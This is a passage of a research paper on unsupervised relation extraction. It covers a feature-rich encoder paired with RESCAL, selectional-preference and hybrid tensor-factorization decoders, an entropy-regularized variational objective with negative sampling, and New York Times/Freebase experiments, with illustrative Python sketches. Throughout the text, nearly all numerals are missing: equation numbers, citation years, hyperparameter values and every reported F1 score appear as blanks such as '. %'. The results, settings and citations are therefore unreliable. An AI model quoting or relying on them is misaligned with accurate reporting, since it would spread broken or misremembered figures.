the first reconstruction model we consider is rescal, a model very successful in the relational modeling context (nickel et al., ; chang et al., ). it is a restricted version of the classic tucker tensor decomposition (tucker, ; kolda and bader, ) and is defined as

ψ_RS(e_1, e_2, r, θ) = u_{e_1}^T C_r u_{e_2},   ( )

where u_{e_1}, u_{e_2} ∈ R^d are the entity embeddings corresponding to the entities e_1 and e_2. C_r ∈ R^{d×d} is a matrix associated with the latent semantic relation r; it evaluates (i.e., scores) the compatibility between the two arguments of the relation.

ψ_SP: selectional preferences

the second factorization ψ_SP scores how well each argument fits the selectional preferences of a given relation r

ψ_SP(e_1, e_2, r, θ) = ∑_{i=1}^{2} u_{e_i}^T c_{i,r},   ( )

where c_{1,r} and c_{2,r} ∈ R^d encode selectional preferences for the first and second argument of the relation r, respectively. this factorization is also known as model e in riedel et al. ( ). in contrast to the previous model, it does not model the interaction between arguments: it is easy to see that p(e_1 | e_2, r, θ) for this model (expression ( )) does not depend on e_2 (i.e., on u_{e_2} and c_{2,r}). consequently, such a decoder would be more similar to generative models of relations which typically assume that arguments are conditionally independent (yao et al., ). note however that our joint model can still capture argument interdependencies in the encoding component. still, this approach does not fully implement the desiderata described in the previous section, so we generally expect this model to be weaker on reasonably-sized collections (this hypothesis will be confirmed in our experimental evaluation).
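as a concrete illustration of the two basic factorizations (a sketch with made-up dimensions, not the authors' implementation), both scoring functions reduce to a few numpy operations over learned entity embeddings u_e and per-relation parameters C_r and c_{i,r}; the hybrid model introduced next simply adds the two scores:

```python
import numpy as np

d, num_relations, num_entities = 30, 40, 10_000
rng = np.random.default_rng(1)

U = rng.normal(size=(num_entities, d))               # entity embeddings u_e (learned)
C_rescal = rng.normal(size=(num_relations, d, d))    # one d x d matrix C_r per latent relation
C_sp = rng.normal(size=(num_relations, 2, d))        # selectional-preference vectors c_{1,r}, c_{2,r}

def psi_rescal(e1, e2, r):
    # psi_RS(e1, e2, r) = u_{e1}^T C_r u_{e2}: scores the argument pair jointly
    return U[e1] @ C_rescal[r] @ U[e2]

def psi_sp(e1, e2, r):
    # psi_SP(e1, e2, r) = u_{e1}^T c_{1,r} + u_{e2}^T c_{2,r}: arguments scored independently
    return U[e1] @ C_sp[r, 0] + U[e2] @ C_sp[r, 1]

print(psi_rescal(3, 7, 5), psi_sp(3, 7, 5))          # toy scores for entities 3 and 7, relation 5
```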
ψ_HY: hybrid model

the rescal model may be too expressive to be accurately estimated for infrequent relations, whereas the selectional preference model cannot, in turn, capture interdependencies between arguments. thus it seems natural to hope that their combination ψ_HY will be more accurate overall:

ψ_HY(e_1, e_2, r, θ) = u_{e_1}^T C_r u_{e_2} + ∑_{i=1}^{2} u_{e_i}^T c_{i,r}.   ( )

this model is very similar to the tensor factorization approach proposed in socher et al. ( ).

learning

we first provide an intuition behind the objective we optimize. we derive it more formally in the subsequent section, where we show that it can be regarded as a variational lower bound on pseudolikelihood (section . . ). as the resulting objective is still computationally expensive to optimize (due to a summation over all potential entities), we introduce further approximations in section . . . the parameters of the encoding and decoding components (i.e., w and θ) are estimated jointly. our general idea is to optimize the quality of argument prediction while averaging over relations

∑_{i=1}^{2} ∑_{r ∈ R} q(r | x, w) log p(e_i | e_{-i}, r, θ).   ( )

though this objective seems natural, it has one serious drawback: the induced posteriors q(r | x, w) end up being extremely sharp which, in turn, makes the search algorithm more prone to getting stuck in local minima. as we will see in the experimental results, this version of the objective results in lower average performance. this behaviour can be explained by drawing connections with variational inference. roughly speaking, direct optimization of the above objective behaves very much like using hard em for generative latent-variable models. intuitively, one solution is, instead of optimizing expression ( ), to consider an entropy-regularized version that favours more uniform posterior distributions q(r | x, w)

∑_{i=1}^{2} ∑_{r ∈ R} q(r | x, w) log p(e_i | e_{-i}, r, θ) + H(q(· | x, w)),   ( )

where the last term H denotes the entropy over q. the entropy term can be seen as posterior regularization (ganchev et al., ) which pushes the posterior q(r | x, w) to be more uniform. as we will see in a moment, this approach can be formally justified by drawing connections to variational inference (jaakkola and jordan, ) and, more specifically, to variational autoencoders (kingma and welling, ).
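the entropy-regularized objective of expression ( ) can be sketched for a single training example as follows; this is illustrative only (an exact softmax over a small toy entity set stands in for p(e_i | e_{-i}, r, θ), which the paper replaces with negative sampling later, and the explicit entropy weight is an assumption, being implicitly 1 here):

```python
import numpy as np

def log_softmax(scores):
    scores = scores - scores.max()
    return scores - np.log(np.exp(scores).sum())

def example_objective(q, scores_pos1, scores_pos2, e1, e2, alpha=1.0):
    """Entropy-regularised reconstruction objective for one (x, e1, e2).

    q:           encoder posterior q(r | x, w) over relations, shape (R,)
    scores_pos1: psi(e', e2, r) for every candidate left argument e', shape (R, |E|)
    scores_pos2: psi(e1, e', r) for every candidate right argument e', shape (R, |E|)
    """
    total = 0.0
    for r in range(len(q)):
        total += q[r] * log_softmax(scores_pos1[r])[e1]   # q(r|x) * log p(e1 | e2, r)
        total += q[r] * log_softmax(scores_pos2[r])[e2]   # q(r|x) * log p(e2 | e1, r)
    entropy = -(q * np.log(q + 1e-12)).sum()              # H(q(. | x, w))
    return total + alpha * entropy                        # maximised during training

# toy usage with 4 relations and 50 candidate entities
rng = np.random.default_rng(0)
q = rng.dirichlet(np.ones(4))
print(example_objective(q, rng.normal(size=(4, 50)), rng.normal(size=(4, 50)), e1=3, e2=7))
```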
variational inference

this subsection presents a justification for the objectives ( ) and ( ); however, a reader not interested in this explanation can safely skip it and proceed directly to section . . . for the moment let us assume that we perform generative modeling, and we consider optimization of the following pseudo-likelihood (besag, ) objective

∑_{i=1}^{2} log ∑_{r} p(e_i | e_{-i}, r, θ) p_u(r),   ( )

where p_u(r) is the uniform distribution over relations. note that currently the encoding model is not part of this objective. the pseudo-likelihood (by jensen's inequality) can be lower-bounded by the following variational bound

∑_{i=1}^{2} ∑_{r ∈ R} q_i(r) log [ p(e_i | e_{-i}, r, θ) p_u(r) ] + H(q_i),   ( )

where q_i is an arbitrary distribution over relations. note that p_u(r) can be dropped from the expression as it corresponds to a constant with respect to the choice of both the variational distributions q_i and the (reconstruction) model parameters θ. in variational inference, the maximization of the original (pseudo-)likelihood objective ( ) is replaced with the maximization of expression ( ) both with respect to q_i and θ. this is typically achieved with an em-like step-wise procedure: steps where q_i is selected for a given θ are alternated with steps where the parameters θ are updated while keeping q_i fixed. one idea, introduced by kingma and welling ( ) for the continuous case, is to replace the search for an optimal q_i with a predictor (a classifier in our discrete case) trained within the same optimization procedure. our encoding model q(r | x, w) is exactly such a predictor. with these two modifications (dropping the nuisance term p_u and replacing q_i with q(r | x, w)), we obtain the objective ( ).

approximation

the objective ( ) cannot be efficiently optimized in its exact form as the partition function of expression ( ) requires the summation over the entire set of possible entities E. in order to deal with this challenge we rely on the negative sampling approach of mikolov et al. ( ). specifically we avoid the softmax in expression ( ) and substitute log p(e_1 | e_2, r, θ) in the objective ( ) with the following expression

log σ(ψ(e_1, e_2, r, θ)) + ∑_{e_neg ∈ S} log σ(-ψ(e_neg, e_2, r, θ)),

where S is a random sample of n entities from the distribution of entities in the collection and σ is the sigmoid function. intuitively, this expression pushes up the scores of arguments seen in the text and pushes down the scores of 'negative' arguments. when there are multiple entities which satisfy the relation r with the given argument (for example, natasha obama and malia ann obama, in relation child of with barack obama) the scores for all such entities will be pushed up. assuming both daughters are mentioned with a similar frequency, they will get similar scores. generally, arguments more frequently mentioned in text will get higher scores. in the end, instead of directly optimizing expression ( ), we use the following objective

∑_{i=1}^{2} E_{q(· | x, w)} [ log σ(ψ(e_i, e_{-i}, r, θ)) + ∑_{e_i^neg ∈ S} log σ(-ψ(e_i^neg, e_{-i}, r, θ)) ] + α H(q(· | x, w)),   ( )

where E_{q(· | x, w)} [ ... ] denotes an expectation computed with respect to the encoder distribution q(r | x, w). note the non-negative parameter α: after substituting the softmax with the negative sampling term, the entropy parameter and the expectation are not on the same scale anymore. though we could try estimating the scaling parameter α, we chose to tune it on the validation set. the gradients of the above objective can be calculated using backpropagation. with the proposed approximation, the computation of the gradients is quite efficient since the reconstruction model has a fairly simple form (e.g., bilinear) and learning the encoder is no more expensive than learning a supervised classifier. we used adagrad (duchi et al., ) as an optimization algorithm.
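a minimal sketch of the negative-sampling substitute for log p(e_i | e_{-i}, r, θ) is given below; the scoring values, the sampling distribution and the sample size are toy assumptions, not the released code:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def neg_sampling_term(psi_positive, psi_negatives):
    """Stands in for log p(e_i | e_{-i}, r, theta) in the training objective.

    psi_positive:  score psi(e_i, e_{-i}, r) of the argument actually observed in text
    psi_negatives: scores psi(e_neg, e_{-i}, r) for the sampled 'negative' entities in S
    """
    psi_negatives = np.asarray(psi_negatives, dtype=float)
    return np.log(sigmoid(psi_positive)) + np.log(sigmoid(-psi_negatives)).sum()

def sample_negatives(entity_counts, n, rng):
    # draw n entities from their empirical distribution in the collection
    probs = entity_counts / entity_counts.sum()
    return rng.choice(len(entity_counts), size=n, p=probs)

rng = np.random.default_rng(0)
negatives = sample_negatives(np.array([50.0, 3.0, 12.0, 7.0, 28.0]), n=3, rng=rng)
print(negatives, neg_sampling_term(psi_positive=2.1, psi_negatives=[-0.3, 0.4, -1.2]))
```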
experiments

in this section we evaluate how effective our model is in discovering relations between pairs of entities in a sentence. we consider the unsupervised setting, so we use clustering measures for evaluation. since we want to directly compare to rel-lda (yao et al., ), we use the transductive set-up: we train our model on the entire training set (with labels removed) and we evaluate the estimated model on a subset of the training set. given that we train the relation classifier (i.e., the encoding model), unlike some of the previous approaches, there is nothing in our approach which prevents us from applying it in an inductive scenario (i.e., to unseen data). towards the end of this section we also provide qualitative evaluation of the induced relations and entity embeddings.

data and evaluation measures

we tested our model on the new york times corpus (sandhaus, ) using articles from to . we use the same filtering and preprocessing steps (pos tagging, ner, and syntactic parsing) as the ones described in yao et al. ( ). in that way we obtained about million entity pairs (i.e., potential relation realizations). in order to evaluate our models, we aligned each entity pair with freebase, and, as in yao et al. ( ), we discarded unaligned ones from the evaluation. we consider freebase relations as gold-standard clusterings and evaluated induced relations against them. note that we use the micro-reading scenario (nakashole and mitchell, ), that is, we predict a relation on the basis of a single occurrence of an entity pair rather than aggregating information across all the occurrences of the pair in the corpus. though it is likely to harm our performance when evaluating against freebase, this is a deliberate choice as we believe extracting relations about less frequent entities (where there is little redundancy in a collection) and modelling content of specific documents is a more challenging and important research direction. moreover, feature-rich models are likely to be especially beneficial in these scenarios, as for micro-reading the information extraction systems cannot fall back to easier non-ambiguous contexts. we use the b-cubed (b3) metric (bagga and baldwin, ) as the scoring function. b3 is a standard measure for evaluating precision and recall of clustering tasks (yao et al., ). as the final evaluation score we use f1, the harmonic mean of precision and recall.

features

the crucial characteristic of the learning method we propose is the ability to handle a rich (and overlapping) set of features. with this in mind we adopted the following set of features:

1. bag of words between e1 and e2;
2. the surface form of e1 and e2;
3. the lemma of the 'trigger' (i.e., for the passage microsoft is based in redmond, the trigger is based and its lemma is base);
4. the part-of-speech sequence between e1 and e2;
5. the entity type of e1 and e2 (as a pair);
6. the entity type of e1;
7. the entity type of e2;
8. words on the syntactic dependency path between e1 and e2, i.e., the lexicalized path between the entities stripped of dependency labels and their direction.

we define triggers as in yao et al. ( ), namely "all the words on the dependency path except stop words". for example, from the sentence stephen moore, director of fiscal policy studies at the conservative cato institute, we would extract the following features:

1. bow:director, bow:of, bow:fiscal, bow:policy, bow:studies, bow:at, bow:the;
2. e1:stephen moore, e2:cato institute;
3. trigger:director;
4. pos:nn in jj nn nns in dt jj;
5. pairtype:person organization;
6. e1type:person;
7. e2type:organization;
8. path:director at.
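a rough illustration of these feature templates and the example above is sketched below; it is a simplification only (token, pos, entity-type and dependency-path annotations are assumed to come precomputed from the preprocessing pipeline, the stop-word list is made up, and details such as punctuation handling differ from the authors' extractor):

```python
STOPWORDS = {'the', 'a', 'an', 'of', 'at', 'in', 'to', 'and', 'for'}

def extract_features(tokens, pos, e1_span, e2_span, e1_type, e2_type, dep_path):
    """Binary feature strings for one entity-pair occurrence.

    dep_path: list of (word, lemma) pairs on the dependency path between e1 and e2;
    spans are (start, end) token offsets; all annotations are assumed precomputed.
    """
    between = range(e1_span[1], e2_span[0])
    feats = ['bow:' + tokens[i].lower() for i in between]                     # 1. bag of words
    feats += ['e1:' + ' '.join(tokens[e1_span[0]:e1_span[1]]),                # 2. surface forms
              'e2:' + ' '.join(tokens[e2_span[0]:e2_span[1]])]
    feats += ['trigger:' + lemma for word, lemma in dep_path                  # 3. trigger lemmas
              if word.lower() not in STOPWORDS]
    feats.append('pos:' + ' '.join(pos[i] for i in between))                  # 4. pos sequence
    feats.append('pairtype:%s %s' % (e1_type, e2_type))                       # 5. entity-type pair
    feats += ['e1type:' + e1_type, 'e2type:' + e2_type]                       # 6-7. entity types
    feats.append('path:' + ' '.join(word for word, _ in dep_path))            # 8. dependency path words
    return feats

print(extract_features(
    tokens=['stephen', 'moore', ',', 'director', 'of', 'fiscal', 'policy', 'studies',
            'at', 'the', 'conservative', 'cato', 'institute'],
    pos=['NNP', 'NNP', ',', 'NN', 'IN', 'JJ', 'NN', 'NNS', 'IN', 'DT', 'JJ', 'NNP', 'NNP'],
    e1_span=(0, 2), e2_span=(11, 13), e1_type='person', e2_type='organization',
    dep_path=[('director', 'director'), ('at', 'at')]))
```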
parameters and baselines

all model parameters (w, θ) were initialized randomly. the embedding dimensionality d was set to . we induced relations, the same as used for rel-lda in yao et al. ( ). we also set the mini batch size to , the initial learning rate of adagrad to . and the number of negative samples n to . the results reported in table are average results of three runs obtained after iterations over the entire training set. for each model we tuned the weight for the l regularization penalty and chose . as it worked well across all the models. we tuned the α coefficient (i.e., the weight for the entropy term) for each model: we chose . for rescal, . for the selectional preferences, and . for the hybrid model. all model selection was performed on a validation set: we selected a random % of the entire dataset, and considered all entity pairs aligned to freebase. the final evaluation was done on the remaining %. in order to compare our models with the state of the art in unsupervised re, we used as a baseline the rel-lda model introduced in yao et al. ( ). rel-lda is an application of the lda topic model (blei et al., ) to the relation discovery task. in rel-lda topics correspond to latent relations, and, instead of relying on words as lda does, rel-lda uses predefined features, including argument words. in a similar fashion to our selectional-preference decoder, it assumes that arguments are conditionally independent given the relation. as another baseline, following yao et al. ( ), we used hierarchical agglomerative clustering (hac). this baseline is very similar to the standard unsupervised relation extraction method dirt (lin and pantel, ). the hac cut-off parameter was set to . based on the development set performance. we used the same feature representation for all the models, including the baselines. we also report results of rel-lda using the features from yao et al. ( ) (yao et al. ( ) is a follow-up work for yao et al. ( )).

table : average f1 results (%), and the standard deviation, across runs of different models on the test set; the columns are rescal, selectional pref., hybrid, rel-lda with our features, rel-lda with the features of yao et al. ( ), and hac (dirt).

results and discussion

the results we report in table are mean and standard deviations across runs with different random initialization of the parameters (except for the deterministic hac approach). first, we can observe that using richer features is beneficial for the generative baseline. it leads to a substantial improvement in f1 (from . % to . % f1). the hac baseline is outperformed by rel-lda ( . % vs. . % f1). however, all our proposed models substantially outperform all baselines: the best result is . % f1. the selectional preference model on average performs better than the best baseline ( . % vs. . % f1). as we predicted in section , compared with the rescal model, the selectional preference model has slightly lower performance ( . % vs. . % f1). this is not surprising as the argument independence assumption is very strong, and the general motivation we provided in section does not really apply to the selectional preference model. combining the rescal and selectional preference models, as we expected, gives some advantage in terms of performance. the hybrid model is the best performing model with . % f1, and it is, on average, . % more accurate than rel-lda.

figure : results of the hybrid model on the validation set, with different α.

the introduction of entropy in expression ( ) not only adds an extra justification to the objective we optimize, but also helps to improve the models' performance. in fact, as shown in figure for the hybrid model, including the entropy term makes a big difference, going from . % f1 without regularization to . % f1 with regularization. note that the method is quite stable within the range α ∈ [ . , ], and more fine-grained tuning of α seems only mildly beneficial. however, the performance with small values of α ( . ) is more problematic: the hybrid model both fails to outperform rel-lda and has a large variance across runs. somewhat counter-intuitively, with α = (no entropy regularization) the variance is almost negligible.
however, given the low performance in this regime, it probably just means that we get consistently stuck in equally bad local minima. though it may seem that the need to tune the entropy term weight is an unfortunate side effect of using the non-probabilistic objective from section . . , the reality is more subtle. in fact, even for fully probabilistic variational autoencoders with real-valued states y, using the weight of , as prescribed by their variational interpretation (see section . . ), does not lead to stable performance (bowman et al., ). instead, annealing over α seems necessary. though annealing is likely to benefit our method as well, we leave it for future work. since the proposed model is unsupervised, it is interesting to inspect the relations induced by our best model. in order to do so, we select the most likely relation according to our relation extractor (i.e., encoding model) for every context in the validation set and then, for every relation, we count occurrences of every trigger. the most frequent triggers for three induced relations are presented in table .

table : relation clusters ordered from left to right by their frequency; each column lists the most frequent triggers of one induced relation.

relation encodes the relation reviewed (not present in freebase), as in anthony tommasini reviews metropolitan opera's production of cosi fan tutte. clusters and are examples of coarser relations. relation represents a broader academic relation, as in the passage dr. susan merritt, dean of the school of computer science and information systems, or as in the passage george myers graduated from yale university. cluster instead groups together expressions such as leads or president (of), so it can vaguely be described as a leadership relation, but it also contains the relation triggered by the word professor (in). in fact, this is the most frequent relation induced by our model. we can check further by looking at the learned embeddings of named entities visualized with the t-sne algorithm (van der maaten and hinton, ). in figure , we can see that entities representing universities and non-academic organizations end up being very close in the embedding space.

figure : t-sne visualization of entity embeddings learned during the training process; visible clusters include political organizations, universities, and general organizations.

this artefact is likely to be related to the coarseness of relations and , though it does not provide a good explanation for why this has happened, since the entity embeddings are also induced within our model. however, overlaps in embeddings do not seem to be a general problem: the t-sne visualization shows that most entities are well clustered into fine-grained types, for example, football teams, nations, and music critics.
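the qualitative analysis just described (per-relation trigger counts and a t-sne map of the entity embeddings) can be reproduced along the lines below; this is a sketch with toy stand-ins for the trained model's outputs, and the use of scikit-learn's t-sne is an assumption rather than the authors' tooling:

```python
from collections import Counter, defaultdict
import numpy as np
from sklearn.manifold import TSNE

rng = np.random.default_rng(0)

# toy stand-ins for the trained model's outputs (assumed shapes, not real data)
U = rng.normal(size=(500, 30))                                # learned entity embeddings
validation = [{'posteriors': rng.dirichlet(np.ones(40)),      # q(r | x, w) from the encoder
               'triggers': ['review']} for _ in range(100)]

# 1) most frequent triggers for each induced relation
trigger_counts = defaultdict(Counter)
for example in validation:
    r = int(np.argmax(example['posteriors']))                 # most likely relation for this context
    trigger_counts[r].update(example['triggers'])
for r, counts in sorted(trigger_counts.items()):
    print(r, counts.most_common(3))

# 2) two-dimensional t-sne map of the entity embeddings (as in the figure above)
coords = TSNE(n_components=2, random_state=0).fit_transform(U)
print(coords.shape)                                           # (500, 2)
```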
decoder influence

in order to examine the influence of the decoder on the model performance, we performed additional experiments in a more controlled setting. we reduced the dataset to entity pairs participating in freebase relations, ending up with a total of about , relation realizations. we randomly split the dataset in two. we used the first half as a test set te, while we used the second half as a training set tr. we further randomly split the training set tr in two parts, tr and tr . we use tr as a (distantly) labeled dataset to learn only the decoding part for each proposed model. to make it comparable to our unsupervised models with induced relations, we trained the decoder on the most frequent freebase relations plus a further other relation, which is a union of the remaining less frequent relations. this approach is similar to the kb factorization adopted in bordes et al. ( ). with the decoder learned and fixed, we trained the encoder part on unlabeled examples in tr , while leveraging the previously trained decoder. in other words, we optimize the objective ( ) on tr but update only the encoder parameters w (we also update embeddings of entities not appearing in tr ). in this setting the decoder provides a learning signal for the encoder. the better the generalization properties of the decoder are, the better the resulting encoder should be. we expect more expressive decoders (i.e., rescal and hybrid) to be able to capture relations better than the selectional preference model and, thus, yield better encoders. in order to have a lower bound for the semi-supervised models, we also trained our best model from the previous experiments (hybrid) on tr in a fully unsupervised way. all models are tested on the test set te. as expected, all models with a supervised decoder are much more accurate than the unsupervised model (table ).

table : average f1 results (%) for semi-supervised and unsupervised models, across runs, tested on te; the rows are semi-sup rescal, semi-sup selectional pref., semi-sup hybrid, and unsup hybrid.

the best results with a supervised decoder are obtained by the rescal model with . % f1, while the result of the unsupervised hybrid model is . % f1. as expected, the rescal and hybrid models outperform the selectional preference model in this setting ( . % and . % vs. . % f1, respectively). somewhat surprisingly, the rescal model is slightly more accurate ( . % f1) than the hybrid model. these experiments confirm that more accurate decoder models lead to better performing encoders. the results also hint at a potential extension of our approach to a more realistic semi-supervised setting, though we leave any serious investigation of this set-up for future work.

additional related work

in this section, we mainly consider lines of related work not discussed in other sections of the paper, and we emphasize their relationship to our approach. distant supervision. these methods can be regarded as a half-way point between unsupervised and supervised methods. distantly supervised models are trained on data generated automatically by aligning knowledge bases (e.g., freebase and wikipedia infoboxes) with text (mintz et al., ; riedel et al., ; surdeanu et al., ; zeng et al., ). similarly to our method they can use feature-rich models without the need for manually annotated data. however, a relation extractor trained in this way will only be able to predict relations already present in a knowledge base. these methods cannot be used to discover new relations. the framework we propose is completely unsupervised and does not have this shortcoming. bootstrapping. bootstrapping methods for relation extraction (agichtein and gravano, ; brin, ; batista et al., ) iteratively label new examples by finding the ones which are the most similar, according to some similarity function, to a seed set of labeled examples.
the process continues until some convergence criteria is met. even though this approach is not very labor-intensive (i.e., it requires only few manually labeled examples for the initial seed set), it requires some domain knowledge from the model designer. in contrast, unsupervised mod- els are domain-agnostic and require only unlabeled text. knowledge base factorization. knowledge base completion via matrix or tensor factorization has re- ceived a lot of attention in the past few years (bor- des et al., ; jenatton et al., ; weston et al., ; bordes et al., ; socher et al., ; garcı́a-durán et al., ; bordes et al., ; lin et al., b; chang et al., ; nickel et al., ). but in contrast to what we propose here, namely, in- duction of new relations, these models factorize re- lations already present in knowledge bases. universal schema methods (riedel et al., ) use factorization models to infer facts (e.g., predict missing entities), but they do not attempt to induce relations. in other words, they consider each given context as a relation and induce an embedding for each of them. they do not attempt to induce a clus- tering over the contexts. our work can be regarded as an extension of these methods. autoencoders with discrete states. aside from the work cited above (daumé iii, ; ammar et al., ; titov and khoddam, ; lin et al., a), we are not aware of previous work using autoencoders with discrete states (i.e., a categori- cal latent variable or a graph). the semisupervised version of variational autoencoders (kingma et al., ) used a combination of a real-valued vector and a categorical variable as its hidden representa- tion and yielded impressive results on the mnist image classification task. however, their approach cannot be directly applied to unsupervised classifi- cation, as there is no reason to believe that latent classes would be captured by the categorical vari- able rather than in some way represented by the real- valued vector. the only other application of variational autoen- coders to natural language is the very recent work of bowman et al. ( ). they study language mod- eling with recurrent language models and consider only real-valued vectors as states. generative models with rich features have also been considered in the past (berg-kirkpatrick et al., ). however, autoencoders are potentially more flexible than generative models as they can use very different encoding and decoding components and can be faster to train. conclusions and discussion we presented a new method for unsupervised rela- tion extraction. the model consists of a feature- rich classifier that predicts relations, and a tensor factorization component that relies on the predicted relations to infer left-out arguments. these models are jointly estimated by optimizing the argument re- construction objective. we studied three alternative factorization models building on ideas from knowledge base factoriza- tion and selectional preference modeling. we em- pirically showed that our factorization models yield relation extractors that are more accurate than state- of-the-art generative and agglomerative clustering baselines. as the proposed modeling framework is quite flexible, the model can be extended in many differ- ent ways. our approach can be regarded as learn- ing semantic representations that are informative for basic inference tasks (in our case, the inference task was recovering individual arguments). more general classes of inference tasks can be considered in future work. 
moreover, it would be interesting to evaluate the proposed model on how accurately it infers these facts (rather than only on the quality of the induced latent representations). the work presented in this paper can also be combined with the approach of titov and khoddam ( ) to induce both relations and semantic roles (i.e., essentially to induce seman- tic frames (fillmore, )). another potential di- rection is the use of labeled data: our feature-rich model (namely its discriminative encoding compo- nent) is likely to have much better asymptotic per- formance than its generative counterpart, and, con- sequently, labeled data should be much more bene- ficial. acknowledgments this work is supported by nwo vidi grant . . , google focused award on natural language understanding and partially supported by isti grant for young mobility. the authors thank github.com/diegma/relation-autoencoder the action editor and the anonymous reviewers for their valuable suggestions and limin yao for an- swering our questions about data and baselines. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in th acm conference on digital libraries. waleed ammar, chris dyer, and noah a. smith. . conditional random field autoencoders for unsuper- vised structured prediction. in nips. sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary g. ives. . dbpedia: a nucleus for a web of open data. in th international semantic web conference (iswc). amit bagga and breck baldwin. . algorithms for scoring coreference chains. in lrec. michele banko and oren etzioni. . the tradeoffs between open and traditional relation extraction. in acl. michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction from the web. in ijcai. david s. batista, bruno martins, and mário j. silva. . semi-supervised bootstrapping of relationship extractors with distributional semantics. in emnlp. taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsu- pervised learning with features. in hlt - naacl. julian besag. . statistical analysis of non-lattice data. the statistician, pages – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . kurt d. bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collabo- ratively created graph database for structuring human knowledge. in sigmod. antoine bordes, jason weston, ronan collobert, and yoshua bengio. . learning structured embed- dings of knowledge bases. in aaai. antoine bordes, nicolas usunier, alberto garcı́a-durán, jason weston, and oksana yakhnenko. . irreflex- ive and hierarchical relations as translations. in struc- tured learning: inferring graphs from structured and unstructured inputs (slg-icml). antoine bordes, xavier glorot, jason weston, and yoshua bengio. . a semantic matching energy function for learning with multi-relational data. jour- nal of machine learning, ( ): – . samuel r. bowman, luke vilnis, oriol vinyals, an- drew m. dai, rafal józefowicz, and samy bengio. . generating sentences from a continuous space. in iclr. sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases workshop (webdb). kai-wei chang, wen-tau yih, bishan yang, and christo- pher meek. . typed tensor decomposition of knowledge bases for relation extraction. in emnlp. 
hal daumé iii. . unsupervised search-based struc- tured prediction. in icml. oier lopez de lacalle and mirella lapata. . un- supervised relation extraction with general domain knowledge. in emnlp. john c. duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . charles j. fillmore. . frame semantics and the na- ture of language. annals of the new york academy of sciences, ( ): – . jenny rose finkel, trond grenager, and christopher d. manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in acl. kuzman ganchev, joao graca, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . alberto garcı́a-durán, antoine bordes, and nicolas usunier. . effective blending of two and three- way interactions for modeling multi-relational data. in european conference on machine learning and knowledge discovery in databases (ecml-pkdd). lise getoor and ben taskar. . introduction to sta- tistical relational learning. mit press. geoffrey e. hinton. . connectionist learning proce- dures. artificial intelligence, ( - ): – . tommi s. jaakkola and michael i. jordan. . com- puting upper and lower bounds on likelihoods in in- tractable networks. in th annual conference on un- certainty in artificial intelligence (uai). rodolphe jenatton, nicolas le roux, antoine bordes, and guillaume obozinski. . a latent factor model for highly multi-relational data. in nips. diederik p. kingma and max welling. . auto- encoding variational bayes. in iclr. diederik p. kingma, shakir mohamed, danilo jimenez rezende, and max welling. . semi-supervised learning with deep generative models. in nips. tamara g. kolda and brett w. bader. . ten- sor decompositions and applications. siam review, ( ): – . dekang lin and patrick pantel. . dirt - discovery of inference rules from text. in sigkdd. chu-cheng lin, waleed ammar, chris dyer, and lori s. levin. a. unsupervised pos induction with word embeddings. in naacl hlt. yankai lin, zhiyuan liu, huan-bo luan, maosong sun, siwei rao, and song liu. b. modeling relation paths for representation learning of knowledge bases. in emnlp. xitong liu, fei chen, hui fang, and min wang. . exploiting entity relationship for query expansion in enterprise search. information retrieval, ( ): – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in iclr. mike mintz, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction with- out labeled data. in acl. ndapandula nakashole and tom m. mitchell. . mi- cro reading with priors: towards second generation machine readers. in akbc at nips. ndapandula nakashole, gerhard weikum, and fabian m. suchanek. . patty: a taxonomy of relational patterns with semantic types. in emnlp. maximilian nickel, volker tresp, and hans-peter kriegel. . a three-way model for collective learning on multi-relational data. in icml. diarmuid ó séaghdha. . latent variable models of selectional preference. in acl. hoifung poon and pedro m. domingos. . unsuper- vised semantic parsing. in emnlp. deepak ravichandran and eduard h. hovy. . learning surface text patterns for a question answer- ing system. in acl. philip resnik. . selectional preference and sense disambiguation. 
in acl siglex workshop on tag- ging text with lexical semantics: why, what, and how. sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in ecml-pkdd. sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in naacl. evan sandhaus. . the new york times annotated corpus. linguistic data consortium, philadelphia, ( ). yusuke shinyama and satoshi sekine. . preemp- tive information extraction using unrestricted relation discovery. in naacl hlt. richard socher, danqi chen, christopher d. manning, and andrew y. ng. . reasoning with neural ten- sor networks for knowledge base completion. in nips. fabian m. suchanek, gjergji kasneci, and gerhard weikum. . yago: a core of semantic knowledge. in www. mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in emnlp- conll. ilya sutskever, ruslan salakhutdinov, and joshua b. tenenbaum. . modelling relational data using bayesian clustered tensor factorization. in nips. idan szpektor, hristo tanev, ido dagan, and bonaven- tura coppola. . scaling web-based acquisition of entailment relations. in emnlp. ivan titov and ehsan khoddam. . unsupervised in- duction of semantic roles within a reconstruction-error minimization framework. in naacl. ivan titov and alexandre klementiev. . a bayesian model for unsupervised semantic parsing. in acl. ledyard r. tucker. . some mathematical notes on three-mode factor analysis. psychometrika, ( ): – . tim van de cruys. . a non-negative tensor fac- torization model for selectional preference induction. journal of natural language engineering, ( ): – . laurens van der maaten and geoffrey hinton. . visualizing data using t-sne. journal of machine learning research, ( - ): . pascal vincent, hugo larochelle, yoshua bengio, and pierre-antoine manzagol. . extracting and com- posing robust features with denoising autoencoders. in icml. jason weston, antoine bordes, oksana yakhnenko, and nicolas usunier. . connecting language and knowledge bases with embedding models for relation extraction. in emnlp. limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in emnlp. limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in acl. daojian zeng, 